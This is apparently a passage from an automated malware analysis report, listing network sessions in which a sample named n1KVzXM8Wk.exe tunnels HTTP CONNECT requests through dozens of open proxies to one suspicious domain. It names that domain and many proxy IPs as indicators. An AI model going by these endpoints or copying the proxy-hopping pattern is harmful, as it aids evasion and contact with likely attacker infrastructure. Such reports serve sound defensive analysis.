                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.25.0</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      588192.168.2.451920104.16.241.204806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.283269882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.587028980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.683094025 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      589192.168.2.451917104.19.106.122806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.283286095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.376174927 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      590192.168.2.4517868.213.129.15200006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.284126997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.581521034 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      591192.168.2.451788123.126.158.50806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.290515900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.597809076 CET303INHTTP/1.1 502 Bad Gateway
                                                                                                      Server: openresty
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 154
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      592192.168.2.450956178.22.168.44442526812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.291033030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      593192.168.2.450864139.99.35.20011806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.302156925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.700202942 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      594192.168.2.452052103.80.77.14436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.305124044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      595192.168.2.452056103.80.77.14436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.306673050 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      596192.168.2.452059103.80.77.14436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.307553053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      597192.168.2.452061103.80.77.14436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.308445930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      598192.168.2.451783102.132.57.9080806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.318414927 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      599192.168.2.45207713.41.14.54436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.319180012 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      600192.168.2.45208213.41.14.54436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.320822001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      601192.168.2.45208413.41.14.54436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.322324038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      602192.168.2.45208713.41.14.54436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.322984934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      603192.168.2.451879174.77.111.19741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.326911926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      604192.168.2.45188398.188.47.15041456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.330725908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      605192.168.2.451959104.19.225.70806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.333565950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.423973083 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      606192.168.2.45193750.231.0.4344816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.334156036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.457046032 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      607192.168.2.451775139.99.148.9031286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.335215092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.693299055 CET536INHTTP/1.1 407 Proxy Authentication Required
                                                                                                      Server: squid/3.5.20
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 3640
                                                                                                      X-Squid-Error: ERR_CACHE_ACCESS_DENIED 0
                                                                                                      Vary: Accept-Language
                                                                                                      Content-Language: en
                                                                                                      Proxy-Authenticate: Basic realm="Squid Basic Authentication"
                                                                                                      X-Cache: MISS from ns547184.ip-139-99-148.net
                                                                                                      X-Cache-Lookup: NONE from ns547184.ip-139-99-148.net:3128
                                                                                                      Via: 1.1 ns547184.ip-139-99-148.net (squid/3.5.20)
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-/


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      608192.168.2.45100672.206.181.12341456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.339565039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      609192.168.2.45104498.162.25.2341456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.339729071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      610192.168.2.451001185.49.30.580816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.346426964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      611192.168.2.45095891.134.140.160489626812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.346666098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.865525007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.366400957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.178670883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      612192.168.2.451992104.16.105.106806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.355144024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.441960096 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      613192.168.2.451845103.162.31.23499356812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.359960079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.098689079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      614192.168.2.45188645.11.95.16550006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.382226944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      615192.168.2.451938184.185.2.1241456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.389394999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      616192.168.2.452051172.67.255.224806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.393402100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.481446028 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      617192.168.2.452078104.21.66.184806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.407161951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.494674921 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      618192.168.2.451964142.54.229.24941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.419668913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      619192.168.2.45186752.172.1.18631286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.429147005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      620192.168.2.45170192.246.139.112305046812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.429168940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.680473089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      621192.168.2.45197851.210.223.930006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.429526091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      622192.168.2.451815146.190.84.209330916812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.429622889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.334253073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.537822008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.943955898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      623192.168.2.451885190.128.228.182806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
